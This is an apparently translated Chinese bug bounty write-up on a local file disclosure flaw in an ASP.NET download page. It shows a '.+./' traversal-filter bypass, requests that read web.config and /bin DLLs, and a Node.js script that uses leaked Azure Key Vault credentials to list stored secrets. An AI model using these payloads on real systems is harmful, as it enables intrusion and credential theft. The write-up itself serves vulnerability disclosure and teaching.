我是如何通过ASP Secrets读取获得1.7万美金奖励的

 

概述

ASP.NET应用程序中比较常见的漏洞之一是本地文件泄露。如果您从未开发或利用过这种技术，那么对LFD的漏洞利用可能会非常困难，并且没有实际作用。在本文中，我描述了如何攻击一个存在LFD漏洞的应用程序，以及后续的漏洞利用方法。

 

定位漏洞

在最近的漏洞挖掘工作中，我遇到了这个站点：

https://domain.com/utility/download.aspx?f=DJ/lc1jVgHTZF…

在加载页面时，它会从服务器上的另一个路径下载帮助文档。由于这是一个加密的参数，因此我不认为我可以篡改其原有的功能，但我在思考是否有任何可以进行的工作。如果我能够攻破用来签署参数的密钥（可能是AES加密），那么就可以伪造参数并进行LFD漏洞利用。

令人惊讶的是，我偶然看到网站上的一些原有内容使用了相同的站点，其地址如下：

https://domain.com/utility/download.aspx?f=file1234.docx

同时，接收内容如下：

HTTP/1.1 200 OK
Connection: close
Content-Length: 27363

Ïó|uœ Z^ tÙ¢yǯ;¬!Y, }{ûCƒ³/h> 
...

在发现这一点之后，我做的第一件事是提供download.aspx作为参数，但之后令人更加惊讶的是，我们发现了download.aspx文件的来源

GET /utility/download.aspx?f=download.aspx

HTTP/1.1 200 OK
Connection: close
Content-Length: 263

<%@ Page Language="C#" AutoEventWireup="true" Debug="true" %>
...

通过阅读download.aspx，我们可以访问任意文件，但这并没有真正意义上证明其影响，因为“文件背后的代码”（存储文件的真正来源）位于filename.aspx.cx。我尝试过，但没有作用。

事实证明，我在尝试的过程中，无法访问.aspx.cs文件。有关.aspx与.aspx.cs之间差异的更多信息，建议参考：

https://stackoverflow.com/questions/13182757/what-is-the-difference-between-aspx-and-aspx-cs 。

这是我们必须找到解决方法的一个位置，但是现在，我们应该尝试从不同的目录中读取，这样就能利用漏洞获取到更多的权限。

 

绕过遍历屏蔽

我发现的另一点，是无法在后面存在两个点（..）,否则请求会响应400错误，并出现失败。

我采取的思路，是进行模糊测试，从而查看是否有任何字符可以忽略或实现连接。

我使用了以下的请求：

GET /utility/download.aspx?f=.[fuzz]./utility/download.aspx

随后，我开始手动迭代字符，最终发现.+./utility/download.aspx可以返回download.aspx的内容。这非常棒，因为现在可以实现目录遍历了。其具体原因我不清楚，我曾经在自己的ASP.NET应用程序上尝试过相同的方法，以判断这是否属于一个通用漏洞，但它在我的应用程序上不起作用。我的猜测是，它与窗口的文件名有关，并且其文件名中应该包含空格。尽管我进行了猜测，但是还没有进行过深入的研究。

 

获取部分源代码

由于我现在可以读取这些路径，因此尝试的第一件事就是读取.ashx文件。考虑到这些是处理程序而不是表示文件（参见： https://www.dotnetperls.com/ashx ），我猜测它们是可访问的。

确实如此！

HTTP/1.1 200 OK
Connection: close
Content-Length: 2398

<%@ WebHandler Language="C#" Class="redacted.redacted" %>

Imports System
Imports System.Data
Imports System.Data.SqlClient
Imports System.IO
Imports System.Web
Imports System.Configuration
...

这至少表明，我们能够获得一些敏感的内容。我的下一步计划是尝试能否阅读更多的源代码。

我们在仔细阅读ASP.NET应用程序文档时，发现其编译后的类保存在/bin/className.dll中。这意味着我们应该能够提取.ashx文件中引用的类名。

通过发出一下请求，我能够获得源文件的DLL（有关存储的DLL的更多信息，请参见： https://blogs.msdn.microsoft.com/tom/2008/07/21/asp-net-tips-loading-a-dll-out-of-the-bin-directory/ ）

GET /utility/download.aspx?f=.+./.+./bin/redacted.dll

在下载后，攻击者可以使用dnSpy导入DLL，并恢复应用程序的源代码。除此之外，还有更多可以遍历的类，能够从中得到源代码

 

获取web.config中Azure密钥

在ASP.NET应用程序中，使用到的配置文件之一是web.config。在这里，要感谢 @nahamsec的强烈建议让我们读取这一文件。

该文件从本质上来说，是一个设置页面，其中包含从单个页面到整个Web服务器的其他变量。在这里，保存了大量敏感信息，例如SQL凭证、上述参数的加密密钥以及应用程序使用的内部端点。

下面是一个示例web.config文件：

<?xml version="1.0" encoding="utf-8"?>
<!--
  For more information on how to configure your ASP.NET application, please visit
  http://go.microsoft.com/fwlink/?LinkId=301880
  -->
<configuration>
  <appSettings>
    <add key="webpages:Version" value="3.0.0.0" />
    <add key="webpages:Enabled" value="false" />
    <add key="ClientValidationEnabled" value="true" />
    <add key="UnobtrusiveJavaScriptEnabled" value="true" />

    <add key="PodioClientId" value="" />
    <add key="PodioClientSecret" value="" />

    <add key="AppId" value="" />
    <add key="SpaceId" value="" />
  </appSettings>

  <connectionStrings>
    <remove name="umbracoDbDSN" />
    <add name="PodioAspnetSampleDb" connectionString="server=WSA07;database=PodioAspnetSampleDb;user id=sa;password=pass" providerName="System.Data.SqlClient" />
  </connectionStrings>

  <system.web>
    <compilation debug="true" targetFramework="4.5" />
    <httpRuntime targetFramework="4.5" />
  </system.web>
</configuration>

要阅读赏金计划目标主机上的web.config，我们只需要发送以下请求：

GET /utility/download.aspx?f=.+./.+./web.config

其响应中，包含了许多Secrets，但最严重的一个是下面的密钥被公开：

...
<add key="keyVaultDataPlaneUri" value="redacted" />
<add key="uniqueKeyVaultNameUri" value="redacted" />
<add key="keyVaultClientId" value="redacted" />
<add key="keyVaultClientSecretIdentifier" value="redacted" />
<add key="keyVaultClientTenantName" value="redacted" />
<add key="keyVaultAuthenticationContextUri" value="redacted" />
<add key="keyVaultApiVersion" value="2016-10-01" />
...

如果正确利用这个密钥，就能够访问Azure Key Vault实例。Azure Key Vault用于保存应用程序的Secrets，其中通常包括一些很有价值的内容。

现在，要解决的问题就是如何发送请求才能访问到这些Secrets。与shubs（ https://twitter.com/infosec_au ）进行交流后，他迅速帮助我将Node.js脚本整合在一起，然后使用公开的密钥访问Azure Key Vault实例。

var KeyVault = require('azure-keyvault');
var AuthenticationContext = require('adal-node').AuthenticationContext;

var clientId = "clientId";
var clientSecret = "clientSecret";
var vaultUri = "vaultUri";

// Authenticator - retrieves the access token
var authenticator = function (challenge, callback) {

  // Create a new authentication context.
  var context = new AuthenticationContext(challenge.authorization);

  // Use the context to acquire an authentication token.
  return context.acquireTokenWithClientCredentials(challenge.resource, clientId, clientSecret, function (err, tokenResponse) {
    if (err) throw err;
    // Calculate the value to be set in the request's Authorization header and resume the call.
    var authorizationValue = tokenResponse.tokenType + ' ' + tokenResponse.accessToken;
    console.log(authorizationValue);
    return callback(null, authorizationValue);
  });

};

var credentials = new KeyVault.KeyVaultCredentials(authenticator);
var client = new KeyVault.KeyVaultClient(credentials);

client.getSecrets(vaultUri).then(function(value) {
    console.log(value);
});

响应如下：

{ id:
     'https://redacted.vault.azure.net/secrets/ftp_credentials',
    attributes:
     { enabled: true,
       created: 2018-01-23T22:14:18.000Z,
       updated: 2018-01-23T22:14:18.000Z,
       recoveryLevel: 'Purgeable' },
    contentType: 'secret' } ]

... more secrets ...

这样一来，游戏就结束了。因为Secrets中包含允许攻击者进行完全写入和读取访问操作的凭据。

 

总结

我们总结了两点。如果希望从ASP.NET中访问源文件，我们可以尝试从/bin/className.dll中读取。如果想要查看Secrets，可以从web.config中读取。

如果想要更好地了解如何攻击ASP.NET应用程序，可以花费一些时间来研究它们。实际上，有很多共同的问题（强制浏览、身份验证绕过、Shell上传、LFD、LFI等），如果我们能注意到每个请求中发送的视图状态Token，那么就应该能注意到这些问题。

 

时间线

报告漏洞 2018年9月25日

确认漏洞 2018年9月27日

收到17000美元奖金 2018年9月29日